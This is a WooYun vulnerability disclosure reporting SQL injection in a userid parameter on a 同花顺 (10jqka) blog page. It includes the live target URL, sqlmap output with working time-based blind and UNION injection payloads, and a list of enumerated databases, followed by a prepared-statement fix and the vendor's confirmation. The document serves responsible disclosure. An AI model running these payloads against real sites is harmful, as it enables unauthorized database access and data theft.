当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198755

漏洞标题:同花顺某站存在SQL注入

相关厂商:同花顺

漏洞作者: Vinc

提交时间:2016-04-21 09:24

修复时间:2016-06-05 09:50

公开时间:2016-06-05 09:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-21: 厂商已经确认,细节仅向厂商公开
2016-05-01: 细节向核心白帽子及相关领域专家公开
2016-05-11: 细节向普通白帽子公开
2016-05-21: 细节向实习白帽子公开
2016-06-05: 细节向公众公开

简要描述:

- = !

详细说明:

URL:http://blog.10jqka.com.cn/blogerTalk.php?action=blogerTalk&userid=84049333
直接用sqlmap验证下:
GET parameter 'userid' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 314 HTTP(s) r
equests:
---
Parameter: userid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=blogerTalk&userid=84049333 AND (SELECT * FROM (SELECT(SLEEP(
5)))DGxe)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: action=blogerTalk&userid=-3514 UNION ALL SELECT CONCAT(0x71766a6a71
,0x5459615659525769684a,0x717a717871),NULL,NULL--
---
[08:51:42] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.12
[08:51:42] [INFO] fetching current user
current user: '[email protected]'

漏洞证明:

available databases [8]:
[*] ace
[*] blog1
[*] information_schema
[*] lph
[*] message
[*] mncg
[*] mysql
[*] test1
总是超时,不跑了。

修复方案:

预编译处理

版权声明:转载请注明来源 Vinc@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-04-21 09:48

厂商回复:

你好,漏洞已确认,正在进行处理,谢谢。

最新状态:

暂无